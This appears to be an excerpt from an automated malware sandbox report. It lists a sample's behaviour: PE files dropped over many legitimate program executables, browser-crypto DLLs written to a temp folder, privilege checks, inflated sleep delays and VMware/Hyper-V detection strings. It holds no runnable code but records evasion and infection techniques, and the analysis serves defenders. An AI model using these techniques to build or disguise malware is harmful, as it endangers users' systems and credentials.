              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\nssdbm3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\freebl3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\softokn3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\System32\SensorDataService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_29-5850
              Source: C:\Windows\System32\snmptrap.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_22-5753
              Source: C:\Windows\System32\wbengine.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-5945
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-5757
              Source: C:\Windows\System32\vds.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-5684
              Source: C:\Windows\System32\msdtc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_24-5705
              Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AgentService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-5659
              Source: C:\Windows\System32\TieringEngineService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\Locator.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_27-5650
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep count: 3587 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2320Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\alg.exe TID: 5508Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\alg.exe TID: 4316Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\msdtc.exe TID: 4600Thread sleep count: 487 > 30
              Source: C:\Windows\System32\msdtc.exe TID: 4600Thread sleep time: -48700s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\alg.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004098A0 FindFirstFileW,FindNextFileW,8_2_004098A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D0A0 FindFirstFileW,8_2_0040D0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,8_2_00414408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D44
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00415610 FindFirstFileW,FindNextFileW,8_2_00415610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,8_2_004087DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D06E FindFirstFileW,8_2_0040D06E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041303C FindFirstFileW,FindNextFileW,FindClose,8_2_0041303C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040989F FindFirstFileW,FindNextFileW,8_2_0040989F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,8_2_004111C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,8_2_00414408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00415610 FindFirstFileW,FindNextFileW,8_2_00415610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041158C FindFirstFileW,FindNextFileW,FindClose,8_2_0041158C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00411590 FindFirstFileW,FindNextFileW,FindClose,8_2_00411590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,8_2_00412D9C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416748 GetSystemInfo,8_2_00416748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: Spectrum.exe, 0000001F.00000003.1519906958.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter2Hg\
              Source: Spectrum.exe, 0000001F.00000002.2647404908.0000000000538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DORMicrosoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver62fa-6a88-b6be-d17
              Source: SensorDataService.exe, 0000001D.00000003.1513774156.0000000000641000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1508234940.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543980844.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790797442.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1555987738.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2090939732.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2065019404.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125327568.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2069852108.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1521291058.0000000000521000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device>a]
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1523593271.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
              Source: AppVClient.exe, 00000011.00000003.1463140549.000000000011F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000003.1463294728.000000000014F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000002.1465148556.0000000000150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00L
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
